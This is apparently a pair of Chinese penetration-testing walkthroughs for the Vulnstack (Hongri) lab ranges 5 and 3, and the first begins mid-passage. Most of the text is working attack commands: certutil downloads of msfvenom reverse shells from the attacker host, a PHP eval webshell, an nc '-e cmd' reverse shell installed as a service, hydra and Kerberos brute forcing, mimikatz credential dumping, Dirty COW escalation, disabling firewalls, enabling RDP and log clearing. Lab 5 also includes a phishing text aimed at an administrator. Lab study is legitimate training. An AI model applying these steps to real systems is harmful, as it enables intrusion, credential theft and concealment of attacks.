-f http://192.168.135.128:5000/shell.phpkali连接webshell查看内网IP，发现内网网段ipconfig利用arp进行主机探测，发现域控主机192.168.138.138arp -a开始代理reGeorg，详细使用方法三种代理方法打入内网certutil -urlcache -split -f http://192.168.135.128:5000/tunnel.php访问网页，发现直接报错，可能不适用windows了那么切换frp，查看一下配置文件，注意这里是windows的frp，我用的版本是0.39.1，去github翻一翻历史版本的，新版本可能会出问题上传到靶机上面去，有两个文件，一个程序一个配置文件然后修改服务端的代理配置vi /etc/proxychains4.conf使用proxychains打开MSF，利用永恒之蓝漏洞，打域控靶机，这里失败了proxychains msfconsole search ms17_010_eternalblue use 0 set rhosts 192.168.138.138 run这个时候我们就可以使用端口扫描进行信息收集（连接某些未开放端口的时候可能会显示超时，这是正常现象，继续等待即可）use scanner/portscan/tcp set RHOSTS 192.168.138.138 run不使用msf也可以使用nmapproxychains nmap -Pn -sT 192.168.138.138查看域信息sun.comwhoami并不是超级管理员也不是系统用户，这下我们就需要提权了，只有上升到系统权限才能使用mimikatz抓取hash注意使用x64模块，不用msf的话也可以上传nc反弹shell# kali msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=2222 LHOST=192.168.135.128 -f exe -o shellx64.exe # 靶机 certutil -urlcache -split -f http://192.168.135.128:5000/shellx64.exe进入msfuse multi/handler set LHOST 192.168.135.128 set lport 2222 set payload windows/x64/meterpreter/reverse_tcp run尝试使用msf的getsystem进行提权创建一个监听器，用于上线靶机（同理可以用nc来上线）我们生成一个可以上线CS的exe程序生成到d盘中，并传到kali中scp .beacon.exe kali@192.168.135.128:/data/windows_atk并使用msf的upload上传此文件upload /data/windows_atk/beacon.exe C:\phpStudy\PHPTutorial\WWW\public\beacon.exe执行木马上线cs设置延迟执行命令 sleep 0 之后，就可以开始提权了尝试了各种操作后，都普通用户提权失败那么能怎么办呢——域内爆破，网上很多教程都是直接登录的administrator用户，直接用CS提权成功（上线的时候就是administartor），并没有完整的复现出来从一个最普通的用户上升到系统权限的教程，就很水信息收集，域内用户，由于当前用户是普通用户，普通用户无法直接获取域内的用户列表shell net view换思路，域内不行，那就本机用户，可以看到有一个administrator用户shell net user那么这个用户也可能是域内的管理员用户吧？我们可以利用msf的kerberos_enumusers爆破 Kerberos 服务（88 端口，前面端口扫描的时候扫出来）proxychains msfconsole use gather/kerberos_enumusers set DOMAIN sun.com set RHOSTS 192.168.138.138 set USERNAME Administrator set PASS_FILE /data/SecLists_Dict/Passwords/darkweb2017-top1000.txt set THREADS 4 run成功爆破出来用户密码为dc123.com注意：如果不用CS那么可以利用 hydra 进行爆破proxychains hydra -l Administrator -P pass.txt -s 445 -t 4 -vV -m "SMB" smb://192.168.138.138我们尝试使用其他用户上线呢我们尝试使用其他用户身份上线以本地用户登录失败，那么就切换到域控服务器需要让我们输入密码，但是msf上线的不是交互式shell连接并查看域控，也失败使用PsExec模块攻击域控，失败！proxychains msfconsole msf6 > use exploit/windows/smb/psexec msf6 > set RHOSTS 192.168.138.138 # 域控IP msf6 > set SMBUser Administrator msf6 > set SMBPass dc123.com msf6 > set SMBDomain sun.com msf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp # 内网直连 msf6 > run试了很多方法都不行，最终以失败告终，无法登录到域控服务器/切换本地用户，或者本地提升到Administrator用户。那么就剩下最后的办法了，社工！(诈骗案例分析，请勿用于违法用途，所造成的后果自行承担)最近张伟管理员发了一条微博：”周末加班部署新防火墙，累成狗🐶”，并且利用一定手段获取到了手机号。【xxx科技IT部】紧急：OA系统漏洞需立即处理，请查收邮件并登录修复平台。确认后请回复“已处理”。到了周末，管理员成功登录了系统，启动了phpstudy这个web服务，此时即可上线kali连接我们的后门weevely terminal http://192.168.135.150/shell.php cmd运行我们的木马即可上线成功设置svc-exe提权方式已成功上线系统权限抓取本地密码hash此时就能看到密码信息了查看域内用户shell net user /domain使用代理转发功能创建一个监听器生成需要上传到域控主机上的木马从本机上传上去certutil -urlcache -split -f http://192.168.135.128:5000/shellx64.exe放行4444端口shell netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=4444开始将马上传到目标服务器shell net use \192.168.138.138ipc$ "管理员密码" /user:administrator shell net use shell dir \192.168.138.138c$ # 查看域控主机目录 # 将马上传到域控服务器 shell copy C:phpStudyPHPTutorialWWWpublicwin7beacon.exe \192.168.138.138c$win7beacon.exe创建执行任务，提示了我们拒绝访问sc \192.168.138.138 create shell binpath= "c:win7beacon.exe"那么就用另外一种方式 at ，添加一个计划任务shell at \192.168.138.138 22:10:00 c:win7beacon.exe耐心等待一分钟既可上线，而且还是最高权限，拿下域控主机关闭防火墙shell netsh advfirewall set allprofiles state off修改注册表允许远程连接shell reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f放行3389端口shell netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP查看用户密码修改代理文件，并重启frp服务本机windows打开代理工具可以看到我们已经能够正常访问域控主机了刚进去是登录错误的，我们重新输入账号密码，登录到域sum.com成功拿下域控服务器！最后清理日志即可至此红日5完成总结攻击路径全景外网突破通过 arp-scan + nmap 探测开放80/3306端口利用ThinkPHP 5.0.22 RCE漏洞（ /index/thinkapp/invokefunction ）上传混淆Webshell（Weevely）实现持久化控制内网渗透发现双网卡结构（NAT+Host-Only）及内网段192.168.138.0/24使用 frp 搭建Socks5代理穿透内网边界通过 proxychains + nmap 扫描域控（192.168.138.138）暴露445端口权限提升MSF生成载荷上线失败后，通过CS的 svc-exe 提权获取SYSTEM权限利用 mimikatz 抓取本地管理员凭证（Administrator:dc123.com）横向移动IPC$共享+计划任务（net use + at）投递Beacon载荷绕过防火墙放行端口（netsh advfirewall）通过RDP（注册表修改fDenyTSConnections）接管域控桌面权限维持域控主机部署多协议后门（MSF+CS双链路）清理日志（clearev）隐藏攻击痕迹关键技术点漏洞利用：ThinkPHP RCE漏洞的EXP构造与混淆Webshell上传隧道搭建：Frp代理穿透双网络隔离环境权限提升：CS的svc-exe提权与Windows服务劫持横向移动：基于SMB的载荷投递与计划任务执行域渗透：Pass-the-Hash攻击与黄金票据伪造（需扩展场景）防御启示外网防护：及时更新框架补丁，禁用危险函数（如 system ）权限控制：遵循最小权限原则，限制数据库远程访问网络隔离：严格ACL策略，阻断异常出站流量（如Socks隧道）日志审计：监控计划任务创建、注册表关键项修改等可疑行为域安全：启用LAPS管理本地管理员密码，限制域管登录范围报告编制方：泷羽Sec安全团队日期：2025年2月21日往期推荐不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学防溯源小技巧ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录

红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学 这是红日团队的第三套靶场，本次靶场渗透涉及敏感信息泄露、暴力破解、脏牛提权、内网穿透、端口转发、以及域渗透等多种知识点。该靶场环境由5台机器组成，其中包括3台Windows机器和2台Linux机器。网络拓扑图如下红日靶场（1-8）全套下载连接：链接:https://pan.baidu.com/s/1ppyPlm6osobxReI50fCSZw?pwd=uze8 提取码:uze8 红日官网：http://vulnstack.qiyuanxuetang.net/那么开始渗透首先添加一张网卡（仅主机模式），192.168.93.0/24 网段web-centos 进去第一条命令，重启网络服务，否则可能上不了网service network restart 网卡1：桥接模式 192.168.1.110网卡2：仅主机 192.168.93.100账号密码：wwwuser/wwwuser_123Aqxweb1-ubuntu仅主机模式：192.168.93.120PC仅主机：192.168.93.30win 2008仅主机：192.168.93.20 Windows 2008本地的管理员用户和域管理员的密码 WIN2008Administrator：123qwe!ASD TESTadministrator：zxcASDqw123!!win 2012仅主机：192.168.93.10kaliIP：192.168.1.8，192.168.1.5（中间换了换 IP）这是一个黑盒测试，开机后就不要进行任何的操作了。外网打点主机发现，因为是桥接模式，ip有点多，所以就挨个测试，看110很可疑，第一次就测出来了22端口，openssh 5.3版本，80端口 nginx 1.9.4 ，Joomla内容管理xi'tong3306测试，发现可以远程登录，但是我们不知道用户信息进一步信息收集查看源码丢给deepseek，看看有没有泄露版本另外在joomla这个cms内容管理系统中呢，这个文件存在版本信息，我们可以看看/administrator/manifests/files/joomla.xml上面可以看到cms的指纹信息了，版本为3.9.12，下面进行漏洞检索searchsploit Joomla 3.9漏洞信息里面是没有可以利用的漏洞的，下面我们用joomscanapt install joomscan joomscan --url http://192.168.1.110/JoomScan 是一款专门针对 Joomla 内容管理系统（CMS）的安全扫描工具，用于检测 Joomla 网站中的漏洞、配置错误和安全风险。扫描出来一个这个东西，访问即可curl http://192.168.1.110/configuration.php~服务攻防找到了mysql的账号密码，刚开始我们已经测试过能远程登录mysql的mysql -utestuser -h192.168.1.110 -p --skip-ssl 密码：cvcvgjASD!@ MySQL [joomla]> use joomla; MySQL [joomla]> select * from umnbt_users;很明显是加了盐的，破解起来很难，这里还有另外一个表am2zu_users查看是否能向外部写文件，以及是否允许写日志文件show variables like '%general%'; SHOW VARIABLES LIKE 'general_log_file';这里发现secure_file_priv是允许向外部写文件的，那么我们尝试写一个shell木马，报错了，看样子是不允许我们写入的MySQL [joomla]> select '<?php phpinfo();@eval($_GET[1]);?>' into outfile '/var/www/html/shell.php'; ERROR 1045 (28000): Access denied for user 'testuser'@'%' (using password: YES)那么更换日志渗透的方法，上面看到日志功能是off的我们需要no，很遗憾也是权限不够MySQL [joomla]> set global general_log=on; ERROR 1227 (42000): Access denied; you need (at least one of) the SUPER privilege(s) for this operation那么久添加后台用户进一步渗透，两个表中呢，我们不清楚哪个表是后台的用户表，那么就都添加一条数据，密码为123456的md5，e10adc3949ba59abbe56e057f20f883e，首先我们要看看需要添加哪些字段desc 表名; id,name,username,email,password,activation,otpKey,otep构造sql语句insert into am2zu_users(id,name,username,email,password,activation,otpKey,otep) values(999,'xiaoyu','xiaoyu@test.com','e10adc3949ba59abbe56e057f20f883e','ssssss','kkkkkk','yyyyy'); # 失败后面搜到了这个网站，有利用方法https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn代码如下INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW()); INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');执行结果MySQL [joomla]> INSERT INTO `am2zu_users` -> (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) -> VALUES ('Administrator2', 'admin2', -> 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW()); Query OK, 1 row affected (0.001 sec) MySQL [joomla]> select * from `am2zu_users`; +-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+ | id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | +-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+ | 891 | Super User | administrator | test@test.com | $2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2 | 0 | 1 | 2019-10-19 12:48:41 | 0000-00-00 00:00:00 | 0 | | 0000-00-00 00:00:00 | 0 | | | 0 | | 896 | Administrator2 | admin2 | | d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199 | 0 | 0 | 2025-02-25 19:56:54 | 2025-02-25 19:56:54 | | | 2025-02-25 19:56:54 | 0 | | | 0 | +-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+ 2 rows in set (0.001 sec) MySQL [joomla]> INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) -> VALUES (896,'8'); Query OK, 1 row affected (0.001 sec) MySQL [joomla]> select * from `am2zu_user_usergroup_map`; +---------+----------+ | user_id | group_id | +---------+----------+ | 891 | 8 | | 896 | 8 | +---------+----------+ 2 rows in set (0.001 sec)从上面那个网站可以知道账号密码为admin2/secret（注意数据一定要对应上，用户id需要对应，并且不能有重复的数据，否则都有可能登录不成功）我们修改主题文件为kali默认的反弹shell文件内容，并修改ip和端口但是呢反弹失败了，切换思路写一句话木马<?php @eval($_POST['pass']);?>使用蚁剑连接内网渗透这里呢被禁用命令了，也难怪刚刚反弹不成功这里我们需要蚁剑的一个插件（魔法）在列表页使用插件使用这个模式就可以正常执行命令啦，后面又试了试各种反弹shell的命令，都没有成功，那么只能利用这个蚁剑的shell了在/tmp/mysql/test.txt文件中有账号密码wwwuser/wwwuser_123Aqxssh连接失败，提示信息为算法问题那么需要加上算法ssh wwwuser@192.168.1.110 -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa # 以下是常见的解决方案 ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@10.10.10.130 # Unable to negotiate with 10.10.10.129 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss ssh ubuntu@10.10.10.131 -oPubkeyAcceptedKeyTypes=+ssh-rsa -i id_rsa ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa -i rain_rsa ubuntu@10.10.10.131内网信息收集使用icmp协议探测内网ip存活数量，发现了另外4台主机（）for i in {1..254}; do (ping -c 1 192.168.93.${i} | grep "bytes from" | grep -v "Unreachable" &); done;上传frpkali开启frp服务器，frp相对详细使用教程见-- 三种代理方式打入内网靶机连接kali的frp服务器修改代理文件vi /etc/proxychains4.conf分别对10，20，120进行端口扫描（耗时可能有点久），第一台和第三台都是windows服务器proxychains nmap -sT -sV -Pn 192.168.93.10 -T4proxychains nmap -sT -sV -Pn 192.168.93.20 -T4proxychains nmap -sT -sV -Pn 192.168.93.30 -T4这台扫描结果是linux的服务器，开着ssh和3306端口，并且80也开着的proxychains nmap -sT -sV -Pn 192.168.93.120 -T4开启浏览器代理，代理到我们的kali，通过kali的代理访问这个内网靶机这是内网中的一个靶机，也是同样的cms，那么我们可不可以以同样的方式去获取密码再次利用joomscan这个工具，扫描结果也是一样的proxychains joomscan --url http://192.168.93.120/和刚刚的配置文件一模一样，那么大概率是使用的内网映射了，源主机是120，但是访问的是100那台具有nat网卡的主机连接ssh后，继续信息收集提权（可跳过）# kali git clone https://github.com/firefart/dirtycow.git cd dirtycow python -m http.server 5000 # 靶机 wget 192.168.1.8:5000/dirty.c gcc -pthread dirty.c -o dirty -lcrypt ./dirty my-new-password mv /tmp/passwd.bak /etc/passwd su firefart password:123456成功提权到最高权限第一台web服务器拿下利用nmap对两台windows靶机的445端口进行漏洞扫描，判断是否存在永恒之蓝漏洞（三台接没有）那么还有一种方法就是SMB爆破了，非常巧，在我的top1000字典中恰好没有这个密码（所以为了伪装成一个大佬我就手动把密码加了进去~），再很巧，两个靶机的smb密码都是123qwe!ASDproxychains hydra -l Administrator -P xato-net-10-million-passwords-1000.txt -s 445 -t 4 -vV -m "SMB" smb://192.168.93.30 proxychains hydra -l Administrator -P xato-net-10-million-passwords-1000.txt -s 445 -t 4 -vV -m "SMB" smb://192.168.93.20域渗透本机windows打开 proxifier，并设置全局代理打开本机windows的cmd，此时就能连接第一台smb服务器，192.168.93.20net use \192.168.93.20ipc$ "123qwe!ASD" /user:administrator # 通过 net use 命令连接到目标服务器的 IPC$ 共享。 dir \192.168.93.20c$ # 列出目标服务器上 C$ 共享目录的内容。第二台192.168.93.30那么接下来就要关闭目标防火墙，开启远程连接，首先创建一个进程，关闭失败sc \192.168.93.20 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \192.168.93.20 start unablefirewall那么添加计划任务关闭防火墙试试呢at \192.168.93.20 23:17:00 'netsh advfirewall set allprofiles state off' at \192.168.93.20 23:17:00 'netsh advfirewall set allprofiles state off'接下来就是修改注册表了，计划任务设置允许远程登录at \192.168.93.20 23:31:00 "reg add 'HKLMSYSTEMCurrentControlSetControlTerminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f"计划任务放行3389端口at \192.168.93.20 23:32:00 'netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389'尝试远程连接，连接失败，切换思路既然无法关闭那么就使用msf咯proxychains msfconsole set RHOST 192.168.93.20 set LHOST 192.168.93.5 # kali地址 set SMBUser Administrator set SMBPass 123qwe!ASD set LPORT 4444 set payload windows/x64/shell_bind_tcp run这里就已经是系统权限了。。。。并且主机名为win2008查看dns服务器，为192.168.93.10，大概率就是域控服务器了ipconfig /all尝试使用密码123qwe!ASD登录域控服务器其他信息收集，检查是否存在杀软windows defender（不存在）sc query WinDefend查看系统类型，是x64的C:Windowssystem32>systeminfo | findstr /i "system type" systeminfo | findstr /i "系�system type" OS Build Type: Multiprocessor Free System Type: x64-based PC上传mimikatz.exeexit set payload windows/x64/meterpreter/bind_tcp run upload -r /data/windows_atk/mimikatz/x64/mimikatz.exe C:\使用shell执行命令，执行失败了那么就退出，使用shell_bind_tcp模块exit set payload windows/x64/shell_bind_tcp run抓取铭文密码mimikatz.exe log privilege::debug sekurlsa::logonpasswords得到两个域的账号密码，枚举DNS服务器的文件系统TEST：zxcASDqw123!! WIN2008：123qwe!ASD开启远程服务# 放行3389端口 netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389 # 关闭防火墙 netsh advfirewall set allprofiles state off # 修改注册表允许远程连接 reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f成功获取20靶机远程操作权限使用test域登录dns服务器，登录成功net use \192.168.93.10ipc$ "zxcASDqw123!!" /user:Administrator dir \192.168.93.10c$创建执行任务，关闭防火墙，执行不了奥sc \192.168.93.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off" sc \192.168.93.10 start unablefirewall那么就利用nc.exe反弹shellcurl -O http://192.168.1.5:5000/nc.exe net use \192.168.93.10ipc$ "zxcASDqw123!!" /user:Administrator copy .nc.exe \192.168.93.10c$ net use \192.168.93.20ipc$ "123qwe!ASD" /user:Administrator copy .nc.exe \192.168.93.20c$可以看到nc已经上传成功了创建一个进程sc \192.168.93.10 create ncshell binpath= "c:nc.exe 192.168.93.20 1234 -e cmd" sc \192.168.93.10 start ncshell在反弹过来的shell中开启远程连接# 放行3389端口 netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389 # 关闭防火墙 netsh advfirewall set allprofiles state off # 修改注册表允许远程连接 reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f使用远程登录，即可发现允许远程登录了（注意Proxifier全局代理不能断掉）拿下winserver2012域控服务器现在已经拿下了三台，那么接下来就是第四台win7（pc），ip：30，回到刚刚的msfset RHOSTS 192.168.93.30开启远程连接# 放行3389端口 netsh advfirewall firewall add rule name="Remote Desktop TCP" dir=in action=allow protocol=TCP localport=3389 # 关闭防火墙 netsh advfirewall set allprofiles state off # 修改注册表允许远程连接 reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f此时已经可以远程连接，输入之前获得的密码即可拿下第最后一台PC主机至此渗透结束，还可以清除日志，关闭全部远程，恢复到初始状态，做好隐蔽措施渗透测试报告总结（deepseek）1. 测试概述本次渗透测试模拟了针对某企业网络的全流程攻击，覆盖外网打点、内网横向渗透、域控提权等多个阶段。目标网络包含Web服务器（CentOS/Ubuntu）、Windows域环境（2008/2012）及内网PC终端（Win7），最终成功获取域控服务器（Windows Server 2012）及全部内网主机的控制权。2. 攻击路径总览graph TD A[外网入口: Web-CentOS] --> B{漏洞利用} B --> C[Joomla 3.9.12后台接管] C --> D[MySQL凭据泄露] D --> E[Webshell上传 & 蚁剑连接] E --> F[SSH登录 & 内网代理搭建] F --> G[内网主机发现] G --> H[横向移动: SMB爆破 & 永恒之蓝漏洞利用] H --> I[域控服务器渗透] I --> J[域内PC终端控制]3. 外网打点阶段3.1 目标识别 IP地址：192.168.1.110（桥接模式） 开放服务： 22端口：OpenSSH 5.3 80端口：Nginx 1.9.4 + Joomla 3.9.12 3306端口：MySQL 5.5.62 3.2 关键漏洞利用(1) Joomla后台接管 漏洞利用：通过configuration.php~备份文件泄露获取MySQL凭据 攻击链： # 数据库操作 INSERT INTO am2zu_users (...) VALUES (...); # 添加管理员账号 INSERT INTO am2zu_user_usergroup_map (...) VALUES (...); # 分配权限 结果：成功登录Joomla后台（admin2/secret） (2) Webshell植入 方法：通过模板编辑注入PHP一句话木马 工具：蚁剑连接http://192.168.1.110/shell.php 提权：利用Dirty Cow漏洞从wwwuser提权至root 4. 内网横向渗透4.1 网络拓扑分析 网段划分： 仅主机模式：192.168.93.0/24 关键主机： 192.168.93.10（域控-Win2012） 192.168.93.20（Win2008） 192.168.93.30（Win7-PC） 4.2 代理隧道搭建 工具：frp反向代理 配置：# frpc.ini [common] server_addr = 192.168.1.8 server_port = 7000 [socks5] type = tcp remote_port = 1080 plugin = socks5 4.3 横向移动关键步骤(1) SMB服务爆破 工具：Hydra 命令： proxychains hydra -l Administrator -P passlist.txt smb://192.168.93.20 结果：破解密码123qwe!ASD，获取Win2008控制权 (2) 永恒之蓝漏洞利用 模块：exploit/windows/smb/ms17_010_eternalblue Payload：windows/x64/meterpreter/reverse_tcp 结果：获取Win2008系统级Shell 5. 域渗透与域控提权5.1 域环境分析 域名称：TEST 域控IP：192.168.93.10 关键凭证： WIN2008Administrator:123qwe!ASD TESTadministrator:zxcASDqw123!! 5.2 域控攻击路径 凭证抓取： mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" 远程执行： sc \192.168.93.10 create ncshell binpath="cmd /c c:nc.exe 192.168.93.20 1234 -e cmd" 权限提升：通过RDP连接接管域控服务器 6. 渗透测试结果 主机IP 操作系统 获取权限级别 关键漏洞/方法 192.168.1.110 CentOS 7 root Joomla SQL注入 + Dirty Cow 192.168.93.20 Windows 2008 SYSTEM SMB密码爆破 + Mimikatz 192.168.93.10 Windows 2012 Domain Admin 横向移动 + 凭证重用 192.168.93.30 Windows 7 Administrator 永恒之蓝漏洞利用 7. 风险总结与修复建议7.1 高风险项 弱密码策略 SMB服务密码123qwe!ASD强度不足 建议：启用复杂度策略 + 定期强制修改 过时软件漏洞 Joomla 3.9.12存在未授权数据库写入风险 建议：升级至最新LTS版本 + 禁用备份文件访问 横向防御缺失 内网主机未部署EDR/流量监控 建议：部署微隔离策略 + 启用Windows Defender ATP 7.2 加固措施 网络层： # 防火墙规则示例（Linux） iptables -A INPUT -p tcp --dport 3306 -j DROP # 禁用MySQL外网访问 系统层： # Windows组策略 Set-ItemProperty "HKLM:SYSTEMCurrentControlSetControlLsa" -Name "DisableDomainCreds" -Value 1 # 禁止明文凭据缓存 应用层： # Nginx配置隐藏版本号 server_tokens off; 8. 总结与反思本次测试暴露了企业网络在边界防护、密码管理和漏洞修复方面的严重不足。建议企业： 建立常态化红蓝对抗机制 每季度执行一次外部漏洞扫描 对运维人员开展ATT&CK攻击链防御培训 渗透测试不仅是技术验证，更是安全意识的觉醒。——By 泷羽Sec安全攻防团队往期推荐红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【渗透测试】ATT&CK靶场一，phpmyadmin，域渗透，内网横向移动攻略【oscp】vulnerable_docker，三种代理方法打入内网【oscp】Tr0ll 靶机全系列（1-3），FTP被玩坏了HTB-Chemistry靶机渗透教程